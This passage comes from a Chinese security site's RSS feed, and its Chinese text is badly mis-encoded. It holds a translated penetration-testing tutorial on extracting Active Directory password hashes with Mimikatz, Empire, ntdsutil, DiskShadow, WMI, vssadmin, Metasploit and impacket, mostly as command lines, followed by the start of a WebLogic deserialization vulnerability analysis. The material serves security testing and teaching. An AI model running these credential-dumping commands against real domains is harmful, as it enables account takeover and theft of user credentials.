1446<p>通过使用/user傿•°æŒ‡å®šåŸŸç”¨æˆ·å,Mimikatzä¼šå°†è¯¥æŒ‡å®šç”¨æˆ·çš„æ‰€æœ‰å¸æˆ·ä¿¡æ¯è½¬å‚¨åŒ…括哈希值。</p>
1447<pre><code>lsadump::dcsync /domain:pentestlab.local /user:test</code></pre>
1448<p><img alt="2mimikatz-dump-user-hash-via-dcsync.png" src="http://image.3001.net/images/20180717/15317924352096.png!small" width="690" height="418"></p>
1449<p>或者我们å¯ä»¥ç›´æŽ¥åœ¨åŸŸæŽ§åˆ¶å™¨ä¸æ‰§è¡ŒMimikatz,通过lsass.exe进程dump密ç 哈希。</p>
1450<pre><code>privilege::debug
1451lsadump::lsa /inject</code></pre>
1452<p><img alt="3mimikatz-dump-domain-hashes-via-lsass.png" src="http://image.3001.net/images/20180717/15317924519930.png!small" width="690" height="332"></p>
1453<p>æ¤æ—¶ï¼Œå°†ä¼šæ£€ç´¢åŸŸç”¨æˆ·çš„密ç 哈希值。</p>
1454<p><img alt="4mimikatz-dump-domain-hashes-via-lsadump.png" src="http://image.3001.net/images/20180717/15317924665110.png!small" width="690" height="456"></p>
1455<h2>Empire</h2>
1456<p>PowerShell Empire有两个模å—,å¯ä»¥é€šè¿‡DCSync攻击检索域哈希。 这两个模å—都需è¦ä»¥åŸŸç®¡ç†å‘˜çš„æƒé™æ‰§è¡Œï¼Œå¹¶ä¸”他们都使用Microsoftå¤åˆ¶æœåŠ¡ã€‚è¿™ä¸¤ä¸ªæ¨¡å—ä¾èµ–于Invoke-Mimikatz PowerShellè„šæœ¬ï¼Œæ¥æ‰§è¡Œä¸ŽDCSync相关的Mimikatz命令。以下模å—的哈希æå–æ ¼å¼ç±»ä¼¼äºŽMetasploit hashdumpçš„è¾“å‡ºæ ¼å¼ã€‚</p>
1457<pre><code>usemodule credentials/mimikatz/dcsync_hashdump</code></pre>
1458<p><img alt="5empire-dcsync-hashdump-module-clean.png" src="http://image.3001.net/images/20180717/15317924824346.png!small" width="690" height="334"></p>
1459<p>DCSync模å—éœ€è¦æˆ‘们指定用户,以æå–叿ˆ·çš„æ‰€æœ‰ä¿¡æ¯ã€‚</p>
1460<p><img alt="6empire-dcsync-module.png" src="http://image.3001.net/images/20180717/15317924962007.png!small" width="690" height="127"></p>
1461<p>执行完æˆåŽï¼Œæˆ‘们将获å–到以下信æ¯ï¼š</p>
1462<p><img alt="7empire-dcsync-account-information.png" src="http://image.3001.net/images/20180717/15317925119606.png!small" width="690" height="390"></p>
1463<h2>Nishang</h2>
1464<p><a href="https://github.com/samratashok/nishang" ref="">Nishang</a>是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载è·çš„一个集åˆï¼Œå¹¶è¢«å¹¿æ³›åº”ç”¨äºŽæ¸—é€æµ‹è¯•çš„å„个阶段。<a href="https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1">Copy-VSS</a>脚本å¯ç”¨äºŽè‡ªåŠ¨åŒ–çš„æå–需è¦çš„æ–‡ä»¶ï¼šNTDS.DIT,SAMå’ŒSYSTEM。这些文件将被æå–到当å‰çš„å·¥ä½œç›®å½•æˆ–ä½ æŒ‡å®šçš„æ–‡ä»¶å¤¹ä¸ã€‚</p>
1465<pre><code>Import-Module .\Copy-VSS.ps1
1466Copy-VSS
1467Copy-VSS -DestinationDir C:\ShadowCopy\</code></pre>
1468<p><img alt="8nishang-extract-ntds-powershell.png" src="http://image.3001.net/images/20180717/15317925283326.png!small" width="682" height="164"></p>
1469<p>或者,å¯ä»¥é€šè¿‡åŠ è½½PowerShell扩展,æ¥ä»ŽçŽ°æœ‰çš„Meterpreter会è¯ä¸æ‰§è¡Œè„šæœ¬ã€‚</p>
1470<pre><code>load powershell
1471powershell_import /root/Copy-VSS.ps1
1472powershell_execute Copy-VSS</code></pre>
1473<p><img alt="9nishang-extract-ntds-meterpreter.png" src="http://image.3001.net/images/20180717/15317925446597.png!small" width="627" height="185"></p>
1474<p>也å¯ä»¥ä½¿ç”¨powershell_shell命令建立一个PowerShell会è¯ï¼Œé€šè¿‡å¯¼å…¥è„šæœ¬æ¥æå–æ–‡ä»¶ã€‚</p>
1475<pre><code>Copy-VSS
1476Copy-VSS -DestinationDir C:\Ninja</code></pre>
1477<h2><img alt="10nishang-extract-ntds-meterpreter-powershell.png" src="http://image.3001.net/images/20180717/15317925605860.png!small" width="574" height="167"></h2>
1478<h2>PowerSploit</h2>
1479<p>PowerSploit包å«PowerShell脚本,该脚本使用å·å½±å¤åˆ¶æœåŠ¡åˆ›å»ºå¯ç”¨äºŽæå–文件的新å·ã€‚</p>
1480<pre><code>Import-Module .\VolumeShadowCopyTools.ps1
1481New-VolumeShadowCopy -Volume C:\
1482Get-VolumeShadowCopy </code></pre>
1483<p><img alt="11powersploit-volumeshadowcopytools.png" src="http://image.3001.net/images/20180717/15317925786162.png!small" width="690" height="164"></p>
1484<p>æˆ–è€…é€šè¿‡åŠ è½½PowerShell扩展,从现有的Meterpreter会è¯ä¸æ‰§è¡Œã€‚</p>
1485<pre><code>powershell_shell
1486New-VolumeShadowCopy -Volume C:\
1487Get-VOlumeShadowCopy
1488</code></pre>
1489<p><img alt="12powersploit-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317925968586.png!small" width="641" height="129"></p>
1490<p>å¯ä»¥ä½¿ç”¨copy命令将文件从新å·å¤åˆ¶åˆ°ç›®æ ‡ã€‚</p>
1491<h2>Invoke-DCSync</h2>
1492<p><a href="https://gist.github.com/monoxgas/9d238accd969550136db">Invoke-DCSync</a>是一个由<a href="https://twitter.com/monoxgas">Nick Landers</a>å’Œleverages PowerViewå¼€å‘çš„PowerShell脚本,Invoke-ReflectivePEInjectionå’ŒPowerKatcher使用Mimikatzçš„DCSyncæ–¹æ³•æ¥æ£€ç´¢å“ˆå¸Œå€¼ã€‚直接执行该函数将生æˆä»¥ä¸‹è¾“出:</p>
1493<pre><code>Invoke-DCSync</code></pre>
1494<p><img alt="13invoke-dcsync-powershell.png" src="http://image.3001.net/images/20180717/15317926624115.png!small" width="583" height="101"></p>
1495<p>å¯ä»¥çœ‹åˆ°ç»“æžœæ˜¯ä»¥è¡¨æ ¼çš„å½¢å¼è¾“å‡ºçš„ã€‚å¦‚æžœæˆ‘ä»¬æ·»åŠ -PWDumpFormat傿•°ï¼Œåˆ™è¾“å‡ºæ ¼å¼ä¸ºuser:id:lm:ntlm:::</p>
1496<pre><code>Invoke-DCSync -PWDumpFormat</code></pre>
1497<p><img alt="14invoke-dcsync-powershell-pwdump-format.png" src="http://image.3001.net/images/20180717/15317926836808.png!small" width="690" height="128"></p>
1498<p>从现有的Meterpreter会è¯ä¸è¿è¡Œè„šæœ¬ï¼Œå¯ä»¥èŽ·å–到相åŒçš„输出结果。</p>
1499<p><img alt="15invoke-dcsync-metasploit.png" src="http://image.3001.net/images/20180717/15317927003910.png!small" width="690" height="168"></p>
1500<p>æ·»åŠ -PWDumpFormat傿•°åŽï¼š</p>
1501<p><img alt="16invoke-dcsync-metasploit-pwdump-format.png" src="http://image.3001.net/images/20180717/15317927147707.png!small" width="690" height="106"></p>
1502<h2>ntdsutil</h2>
1503<p>ntdsutil是一个命令行工具,是域控制器生æ€ç³»ç»Ÿçš„一部分,其主è¦ç”¨é€”是使管ç†å‘˜èƒ½å¤Ÿè½»æ¾è®¿é—®å’Œç®¡ç†Windows Active Directoryæ•°æ®åº“ã€‚ä½†å®ƒå¸¸è¢«æ¸—é€æµ‹è¯•人员或红队队员滥用æ¥èŽ·å–现有的ntds.dit文件快照,并且å¯ä»¥å°†è¯¥æ–‡ä»¶å¤åˆ¶åˆ°æ–°çš„租约ä¸ï¼Œä»¥è¿›è¡Œç¦»çº¿çš„分æžå’Œå¯†ç 哈希的æå–。</p>
1504<pre><code>ntdsutil
1505activate instance ntds
1506ifm
1507create full C:\ntdsutil
1508quit
1509quit</code></pre>
1510<p><img alt="17ntdsutil.png" src="http://image.3001.net/images/20180717/15317929648572.png!small" width="690" height="440"></p>
1511<p>它将为我们生æˆä¸¤ä¸ªæ–°æ–‡ä»¶å¤¹ï¼šActive Directoryå’ŒRegistry。NTDS.DIT文件将被ä¿å˜åˆ°Active Directoryä¸ï¼Œè€ŒSAMå’ŒSYSTEM文件则将被ä¿å˜åˆ°Registry文件夹ä¸ã€‚</p>
1512<p><img alt="18ntdsutil-ntds.png" src="http://image.3001.net/images/20180717/15317929841879.png!small" width="641" height="354"></p>
1513<h2>DiskShadow</h2>
1514<p>DiskShadow是一个Microsoftç¾å二进制文件,用于å助管ç†å‘˜æ‰§è¡Œä¸Žå·å½±å¤åˆ¶æœåŠ¡ï¼ˆVSS)相关的æ“作。这个二进制文件有两个模å¼interactiveå’Œscript ,脚本将包å«è‡ªåŠ¨æ‰§è¡ŒNTDS.DITæå–过程所需的所有命令。我们å¯ä»¥åœ¨è„šæœ¬æ–‡ä»¶ä¸æ·»åŠ ä»¥ä¸‹è¡Œï¼Œä»¥åˆ›å»ºæ–°çš„volume shadow copy(å·å½±å¤åˆ¶ï¼‰ï¼ŒæŒ‚载新驱动,执行å¤åˆ¶å‘½ä»¤ä»¥åŠåˆ 除volume shadow copy。</p>
1515<pre><code>set context persistent nowriters
1516add volume c: alias someAlias
1517create
1518expose %someAlias% z:
1519exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
1520delete shadows volume %someAlias%
1521reset</code></pre>
1522<p>éœ€è¦æ³¨æ„的是,DiskShadow二进制文件需è¦ä»ŽC:\Windows\System32è·¯å¾„æ‰§è¡Œã€‚å¦‚æžœä»Žå…¶å®ƒè·¯å¾„è°ƒç”¨å®ƒï¼Œè„šæœ¬å°†æ— æ³•æ£ç¡®æ‰§è¡Œã€‚</p>
1523<pre><code>diskshadow.exe /s c:\diskshadow.txt</code></pre>
1524<p><img alt="19diskshadow.png" src="http://image.3001.net/images/20180717/1531793011813.png!small" width="690" height="429"></p>
1525<p>直接从解释器è¿è¡Œä»¥ä¸‹å‘½ä»¤ï¼Œå°†åˆ—出系统的所有å¯ç”¨volume shadow copy。</p>
1526<pre><code>diskshadow
1527LIST SHADOWS ALL</code></pre>
1528<p><img alt="20diskshadow-retrieve-shadow-copies.png" src="http://image.3001.net/images/20180717/153179304324.png!small" width="690" height="304"></p>
1529<p>SYSTEM注册表hive也应该被å¤åˆ¶ï¼Œå› 为其包å«äº†è§£å¯†NTDS文件内容所需的密钥。</p>
1530<pre><code>reg.exe save hklm\system c:\exfil\system.bak
1531</code></pre>
1532<h2><img alt="21diskshadow-copy-system-from-registry.png" src="http://image.3001.net/images/20180717/15317930654338.png!small" width="690" height="309"></h2>
1533<h2>WMI</h2>
1534<p><a href="https://twitter.com/PyroTek3">Sean Metcalf</a>在他的åšå®¢ä¸è¯æ˜Žï¼Œå¯ä»¥é€šè¿‡WMI远程æå–NTDS.DITå’ŒSYSTEM文件。该项技术利用vssadmin二进制文件æ¥åˆ›å»ºå·å½±å¤åˆ¶ã€‚</p>
1535<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
1536</code></pre>
1537<p><img alt="22wmi-create-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317930866708.png!small" width="690" height="199"></p>
1538<p>ç„¶åŽï¼Œå®ƒå°†è¿œç¨‹æ‰§è¡Œå¤åˆ¶å‘½ä»¤ï¼Œå¹¶å°†å·å½±å¤åˆ¶ä¸çš„NTDS.DIT文件æå–åˆ°ç›®æ ‡ç³»ç»Ÿä¸Šçš„å¦ä¸€ä¸ªç›®å½•ä¸ã€‚</p>
1539<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"</code></pre>
1540<p><img alt="23wmi-copy-ntds-file.png" src="http://image.3001.net/images/20180717/15317931062602.png!small" width="690" height="217"></p>
1541<p>è¿™ä¹ŸåŒæ ·é€‚用于SYSTEM文件。</p>
1542<pre><code>wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
1543</code></pre>
1544<p><img alt="24wmi-copy-system-file.png" src="http://image.3001.net/images/20180717/15317931277446.png!small" width="690" height="215"></p>
1545<p>之åŽï¼Œè¢«æå–çš„æ–‡ä»¶å°†ä¼šä»ŽåŸŸæŽ§åˆ¶å™¨è¢«ä¼ è¾“åˆ°å¦ä¸€ä¸ªWindows系统,以转储域密ç 哈希值。</p>
1546<pre><code>PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
1547PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp</code></pre>
1548<p><img alt="25wmi-transfer-files-via-copy.png" src="http://image.3001.net/images/20180717/15317931547367.png!small" width="690" height="66"></p>
1549<p>如果已生æˆé»„金票æ®ï¼Œåˆ™å¯ä»¥ä½¿ç”¨å®ƒä»£æ›¿å‡æ®ï¼Œé€šè¿‡Kerberos与域控制器进行身份验è¯ã€‚</p>
1550<h2>vssadmin</h2>
1551<p>volume shadow copy是一个Windows命令行实用程åºï¼Œç®¡ç†å‘˜å¯ä»¥ä½¿ç”¨å®ƒå¤‡ä»½è®¡ç®—机,å·ä»¥åŠæ–‡ä»¶ï¼ˆå³ä½¿æ“作系统æ£åœ¨ä½¿ç”¨è¿™äº›èµ„æºï¼‰ã€‚Volume Shadow Copy作为一个æœåŠ¡è¿è¡Œï¼Œå¹¶è¦æ±‚æ–‡ä»¶ç³»ç»Ÿçš„æ ¼å¼ä¸ºNTFS(默认情况下windowsæ“ä½œç³»ç»Ÿæ–‡ä»¶æ ¼å¼å‡ä¸ºNTFS)。从Windows命令æç¤ºç¬¦æ‰§è¡Œä»¥ä¸‹å‘½ä»¤ï¼Œå°†ä¼šåˆ›å»ºä¸€ä¸ªCç›˜çš„å¿«ç…§ï¼Œè¿™æ ·æˆ‘ä»¬å°±å¯ä»¥å°†å…¶å¤åˆ¶åˆ°å¦ä¸€ä¸ªä½ç½®ï¼ˆå¦‚本地文件夹,网络文件夹或å¯ç§»åŠ¨ä»‹è´¨ï¼‰ä»¥èŽ·å–它的访问æƒé™ã€‚</p>
1552<pre><code>vssadmin create shadow /for=C:</code></pre>
1553<p><img alt="26vssadmin-create-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317931759208.png!small" width="690" height="260"></p>
1554<p>由于我们已ç»å°†C盘ä¸çš„æ‰€æœ‰æ–‡ä»¶éƒ½å¤åˆ¶åˆ°äº†å¦ä¸€ä¸ªä½ç½®ï¼ˆHarddiskVolumeShadowCopy1ï¼‰ï¼Œå› æ¤å®ƒä»¬ä¸ä¼šè¢«æ“作系统直接使用,我们å¯ä»¥éšæ„访问并å¤åˆ¶å…¶ä¸çš„æ–‡ä»¶ã€‚使用copy命令将NTDS.DITå’ŒSYSTEM文件,å¤åˆ¶åˆ°æœ¬åœ°å为ShadowCopy的驱动ä¸çš„æ–°å»ºæ–‡ä»¶å¤¹ä¸ã€‚</p>
1555<pre><code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
1556copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
1557</code></pre>
1558<p><img alt="27copy-files-from-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317932001520.png!small" width="690" height="213"></p>
1559<p>我们需è¦å°†è¿™äº›æ–‡ä»¶ä»ŽåŸŸæŽ§åˆ¶å™¨å¤åˆ¶åˆ°å¦ä¸€ä¸ªä¸»æœºä»¥è¿›ä¸€æ¥çš„处ç†ã€‚</p>
1560<p><img alt="28shadowcopy-files.png" src="http://image.3001.net/images/20180717/15317932242812.png!small" width="638" height="351"></p>
1561<h2> vssown</h2>
1562<p><a href="https://twitter.com/lanmaster53">Tim Tomes</a>å¼€å‘了一个与vssadmin类似的实用程åº<a href="https://github.com/lanmaster53/ptscripts/blob/master/windows/vssown.vbs">vssown</a>,它å¯ä»¥åˆ›å»ºå’Œåˆ 除å·å½±å¤åˆ¶ï¼Œä»ŽæœªæŒ‚载的å·å½±å¤åˆ¶è¿è¡Œä»»æ„坿‰§è¡Œæ–‡ä»¶ï¼Œä»¥åŠå¯åŠ¨å’Œåœæ¢å·å½±å¤åˆ¶æœåŠ¡ã€‚</p>
1563<pre><code>cscript vssown.vbs /start
1564cscript vssown.vbs /create c
1565cscript vssown.vbs /list
1566cscript vssown.vbs /delete
1567</code></pre>
1568<p><img alt="29vssown-volume-shadow-copy.png" src="http://image.3001.net/images/20180717/15317932449222.png!small" width="690" height="521"></p>
1569<p>所需文件å¯ä»¥ä½¿ç”¨copy命令æ¥å¤åˆ¶ã€‚</p>
1570<pre><code>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\ntds\ntds.dit C:\vssown
1571copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SYSTEM C:\vssown
1572copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy11\windows\system32\config\SAM C:\vssown</code></pre>
1573<h2><img alt="30vssown-copy-ntds-system-and-sam-files.png" src="http://image.3001.net/images/20180717/15317932699173.png" width="690" height="206"></h2>
1574<h2>Metasploit</h2>
1575<p>Metasploitæ¡†æž¶ä¸æœ‰ä¸€ä¸ªæ¨¡å—,å¯ä»¥é€šè¿‡SMBæœåŠ¡ç›´æŽ¥ä¸ŽåŸŸæŽ§åˆ¶å™¨è¿›è¡Œèº«ä»½éªŒè¯ï¼Œåˆ›å»ºç³»ç»Ÿé©±åŠ¨çš„å·å½±å¤åˆ¶ï¼Œå¹¶å°†NTDS.DITå’ŒSYSTEM hive的副本下载到Metasploit目录ä¸ã€‚这些文件å¯ä»¥ä¸Žimpacketç‰å…¶ä»–工具一起使用,这些工具å¯ç”¨äºŽæ‰§è¡Œæ´»åŠ¨ç›®å½•å¯†ç 哈希值的æå–。</p>
1576<pre><code>auxiliary/admin/smb/psexec_ntdsgrab</code></pre>
1577<p><img alt="31metasploit-ntds-module.png" src="http://image.3001.net/images/20180717/1531793289956.png!small" width="690" height="416"></p>
1578<p>还有一个åŽåˆ©ç”¨æ¨¡å—,å¯ä»¥é“¾æŽ¥åˆ°çŽ°æœ‰çš„Meterpreter会è¯ï¼Œå¹¶é€šè¿‡ntdsutil方法检索域哈希。</p>
1579<pre><code>windows/gather/credentials/domain_hashdump</code></pre>
1580<p><img alt="32metasploit-domain-hashdump.png" src="http://image.3001.net/images/20180717/15317933106984.png!small" width="690" height="394"></p>
1581<p>或者,如果有现æˆçš„到域控制器的Meterpreter会è¯ï¼Œåˆ™å¯ä»¥ä½¿ç”¨hashdump命令。但该方法并ä¸å®‰å…¨ï¼Œå› 为它很有å¯èƒ½ä¼šå¯¼è‡´åŸŸæŽ§åˆ¶å™¨å´©æºƒã€‚</p>
1582<pre><code>hashdump</code></pre>
1583<h2><img alt="33metasploit-hashdump-on-dc.png" src="http://image.3001.net/images/20180717/15317933328094.png!small" width="690" height="184"></h2>
1584<h2>fgdump</h2>
1585<p><a href="http://www.foofus.net/fizzgig/fgdump/fgdump-2.1.0-exeonly.zip">fgdump</a>是一个用于æå–LanManå’ŒNTLM密ç å“ˆå¸Œå€¼çš„å·¥å…·ã€‚å¦‚æžœå·²èŽ·å–æœ¬åœ°ç®¡ç†å‘˜å‡æ®ï¼Œåˆ™å¯ä»¥åœ¨æœ¬åœ°æˆ–远程执行。在执行期间,fgdumpå°†å°è¯•ç¦ç”¨ç³»ç»Ÿä¸Šè¿è¡Œçš„æ€æ¯’è½¯ä»¶ï¼Œå¦‚æžœæˆåŠŸï¼Œåˆ™ä¼šå°†æ‰€æœ‰æ•°æ®å†™å…¥åˆ°ä¸¤ä¸ªæ–‡ä»¶ä¸ã€‚如果å˜åœ¨æ€è½¯ï¼Œåˆ™å»ºè®®æœ€å¥½ä¸è¦ä½¿ç”¨fgdumpæ¥è½¬å‚¨å¯†ç å“ˆå¸Œã€‚å› ä¸ºï¼Œå¤§å¤šæ•°å®‰å…¨å…¬å¸çš„æ€æ¯’è½¯ä»¶ï¼ˆåŒ…æ‹¬Microsoftçš„Windows Defenderï¼‰éƒ½å¯¹å…¶è¿›è¡Œäº†æ ‡è®°ã€‚</p>
1586<pre><code>fgdump.exe</code></pre>
1587<p><img alt="34fgdump-domain-controller.png" src="http://image.3001.net/images/20180717/15317933566861.png!small" width="690" height="446"></p>
1588<p>通过检查.pwdumpæ–‡ä»¶çš„å†…å®¹æ¥æ£€ç´¢å¯†ç 哈希值。</p>
1589<pre><code>type 127.0.0.1.pwdump</code></pre>
1590<h2><img alt="35fgdump-pwdump-file.png" src="http://image.3001.net/images/20180717/15317933796738.png!small" width="690" height="215"></h2>
1591<h2>NTDS 窃å–</h2>
1592<p>Impacket是一组python脚本,å¯ç”¨äºŽæ‰§è¡Œå„ç§ä»»åŠ¡ï¼ŒåŒ…æ‹¬æå–NTDS文件的内容。impacket-secretsdump模å—éœ€è¦æˆ‘们æä¾›SYSTEMå’ŒNTDSæ•°æ®åº“文件。</p>
1593<pre><code>impacket-secretsdump -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
1594</code></pre>
1595<p><img alt="36impacket-extract-ntds-contents.png" src="http://image.3001.net/images/20180717/1531793414377.png!small" width="690" height="279"></p>
1596<p>æ¤å¤–,impacketå¯ä»¥é€šè¿‡ä½¿ç”¨è®¡ç®—æœºå¸æˆ·åŠå…¶å“ˆå¸Œè¿›è¡Œèº«ä»½éªŒè¯ä»ŽNTDS.DIT文件远程转储域密ç 哈希。</p>
1597<pre><code>impacket-secretsdump -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1</code></pre>
1598<p><img alt="37impacket-extract-ntds-contents-remotely.png" src="http://image.3001.net/images/20180717/15317934404899.png!small" width="690" height="347"></p>
1599<p>作为impacket的替代解决方案,<a href="https://github.com/zcgonvh/NTDSDumpEx">NTDSDumpEx</a>二进制文件å¯ä»¥ä»ŽWindowsä¸»æœºä¸æå–域密ç 哈希值。</p>
1600<pre><code>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive</code></pre>
1601<p><img alt="38ntdsdumpex.png" src="http://image.3001.net/images/20180717/15317934742442.png" width="690" height="294"></p>
1602<p>还有一个shell脚本<a href="https://github.com/LordNem/adXtract">adXtract</a>,å¯å°†ç”¨æˆ·å和密ç 哈希导出为一ç§å¯è¢«å¸¸è§çš„密ç ç ´è§£ç¨‹åºä½¿ç”¨çš„æ ¼å¼ï¼Œä¾‹å¦‚John the Ripperå’ŒHashcat。</p>
1603<pre><code>./adXtract.sh /root/ntds.dit /root/SYSTEM pentestlab</code></pre>
1604<p><img alt="39adxtract.png" src="http://image.3001.net/images/20180717/15317935044264.png!small" width="690" height="370"></p>
1605<p>该脚本将所有信æ¯å†™å…¥é¡¹ç›®å称下的å„个文件ä¸ï¼Œå½“æ•°æ®åº“文件NTDS的解密完æˆåŽï¼Œç”¨æˆ·åˆ—表和密ç 哈希值将会导出到控制å°ä¸ã€‚该脚本将为我们æä¾›å¤§é‡æœ‰å…³åŸŸç”¨æˆ·çš„ä¿¡æ¯ï¼Œå¦‚下所示。</p>
1606<p><img alt="40adxtract-list-of-users.png" src="http://image.3001.net/images/20180717/15317935347933.png!small" width="690" height="416"></p>
1607<p>密ç å“ˆå¸Œå°†ä»¥ä¸‹åˆ—æ ¼å¼æ˜¾ç¤ºã€‚</p>
1608<p><img alt="41adxtract-password-hashes.png" src="http://image.3001.net/images/20180717/15317935572218.png!small" width="690" height="364"></p>
1609</p>
1610<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/">pentestlab</a>,FBå°ç¼– secist 编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1611]]></content:encoded>
1612 <wfw:commentRss>http://www.freebuf.com/articles/system/177764.html/feed</wfw:commentRss>
1613 <slash:comments>0</slash:comments>
1614 </item>
1615 <item>
1616 <title>天èžä¿¡å…³äºŽCVE-2018-2893 WebLogicååºåˆ—åŒ–æ¼æ´žåˆ†æž</title>
1617 <link>http://www.freebuf.com/vuls/178105.html</link>
1618 <comments>http://www.freebuf.com/vuls/178105.html#comments</comments>
1619 <pubDate>Wed, 25 Jul 2018 02:00:53 +0000</pubDate>
1620 <dc:creator>alphalab</dc:creator>
1621 <category><![CDATA[WEB安全]]></category>
1622 <category><![CDATA[æ¼æ´ž]]></category>
1623 <category><![CDATA[weblogic]]></category>
1624 <category><![CDATA[ååºåˆ—化]]></category>
1625
1626 <guid isPermaLink="false">http://www.freebuf.com/?p=178105</guid>
1627 <description><![CDATA[一ã€èƒŒæ™¯ä»‹ç» WebLogic是美国Oracleå…¬å¸å‡ºå“的一个Application Server,确切的说是一个基于JAVA EE架构的ä¸é—´ä»¶, WebLogic是用于开å‘ã€é›†æˆã€éƒ¨ç½²å’Œç®¡ç†å¤§åž‹åˆ†å¸ƒå¼Web应用ã€ç½‘络应用和数æ®åº“应用的Java应用æœåŠ¡å™¨ã€‚ 1.1 æ¼æ´žæè¿° Oracle官方在2018å¹´7月å‘å¸ƒäº†å…³é”®è¡¥ä¸æ›´æ–°ï¼Œå…¶ä¸åŒ…å«äº†Oracle WebLogic Server的一个高å±çš„WebLogicååºåˆ—åŒ–æ¼æ´žï¼Œé€šè¿‡è¯¥æ¼æ´žï¼Œæ”»å‡»è€…å¯ä»¥åœ¨æœªæŽˆæƒçš„æƒ…况下远程执行代ç 。   æ¤æ¼æ´žäº§ç”ŸäºŽWebLogic T3æœåŠ¡ï¼Œå½“å¼€æ”¾WebLogic控制å°ç«¯å£ï¼ˆé»˜è®¤ä¸º7001端å£ï¼‰æ—¶ï¼ŒT3æœåŠ¡ä¼šé»˜è®¤å¼€å¯ï¼Œå› æ¤ä¼šé€ æˆè¾ƒå¤§å½±å“ã€‚ç»“åˆæ›¾ç»çˆ†å‡ºçš„WebLogic WLS ç»„ä»¶æ¼æ´žï¼Œä¸æŽ’é™¤ä¼šæœ‰æ”»å‡»è€…åˆ©ç”¨æ¼æ´žæŒ–矿的å¯èƒ½ï¼Œå› æ¤ï¼Œå»ºè®®å—å½±å“ä¼ä¸šç”¨æˆ·å°½å¿«éƒ¨ç½²é˜²æŠ¤æŽªæ–½ã€‚ 1.2 å—å½±å“的系统版本 WebLogic10.3.6.0 WebLogic12.1.3.0 WebLogic12.2.1.2 WebLogic12.2.1.3 1.3 æ¼æ´žç¼–å· CVE-2018-2893 äºŒã€æ¼æ´žç»†èŠ‚ 这次的WebLogic (CVE-2018-2893)æ¼æ´žå’Œä¹‹å‰çš„JRMPåè®®æ¼æ´ž(CVE-2018-2628)æ¼æ´žæ˜¯åˆ†ä¸å¼€çš„,他是结åˆäº†RMI机制缺陷和JDKååºåˆ—åŒ–æ¼æ´žç»•过了WebLogic黑åå•,所以介ç»è¿™ä¸ªæ¼æ´žä¹‹å‰ï¼Œå…ˆå›žé¡¾ä¸‹ä¹‹å‰çš„æ¼æ´žåˆ©ç”¨é“¾ã€‚ 在CVE-2015-4852 ä¸åˆ©ç”¨çš„æ˜¯Commons Collections 库,主æµçš„两大利用链是TransformedMapå’ŒLazymapï¼Œå…¶å®žä»–ä»¬çš„æ ¸å¿ƒéƒ½æ˜¯ç±»ä¼¼çš„ã€‚ 先拿TransformedMapåšä¸ªä»‹ç»ï¼Œæ ¸å¿ƒæ˜¯å射机制。 å射机制 JAVAå射机制是在è¿è¡Œçжæ€ä¸ï¼Œå¯¹äºŽä»»æ„一个类,都能够知é“这个类的所有属性和方法;对于任æ„一个对象,都能够调用它的任æ„一个方法和属性;这ç§åЍæ€èŽ·å–的信æ¯ä»¥åŠåЍæ€è°ƒç”¨å¯¹è±¡çš„æ–¹æ³•的功能称为Javaè¯è¨€çš„å射机制。 å¯¹åº”å¾—ä»£ç æ˜¯è¿™æ ·,下é¢è¿™æ®µä»£ç å°±å¯ä»¥é€šè¿‡å射调用java.net.URLClassLoader.class,这个类å¯ä»¥æœ¬åœ°æˆ–者远程拉起任æ„çš„jaræ–‡ä»¶ï¼ŒåŒæ—¶ä¸ç”¨ç®¡æ–‡ä»¶ååŽç¼€ï¼Œç›´æŽ¥è¯»å–二进制的jar文件。下é¢è¿™ä¸ªæ˜¯æ‹‰èµ·äº†ä¸€ä¸ªåå¼¹Shell功能的jar文件。 ç„¶åŽå†æ¥çœ‹çœ‹æ ¸å¿ƒçš„å射方法,InvokerTransformerä¸çš„transform方法。这个方法就是实现执行任æ„ç±»çš„æ ¸å¿ƒæ–¹æ³•ï¼Œä½†æ˜¯å¿…é¡»éœ€è¦é€šè¿‡ååºåˆ—化的方å¼è°ƒç”¨è¿™ä¸ªæ–¹æ³•。那么是如何调用的呢? 在TransformedMap䏿œ‰ä¸‰ä¸ªæ–¹æ³•调用了transform方法 下é¢å°±æ˜¯æ‰¾åˆ°è°è°ƒç”¨äº†è¿™3个方法ä¸çš„一个,å¯ä»¥çœ‹åˆ°TransformdMap继承了父类,所有的类都实现了åºåˆ—化接å£ï¼Œä¸ç„¶æ— 法ååºåˆ—化,这个ä¸å†é‡å¤å¼ºè°ƒ 跟进这个父类 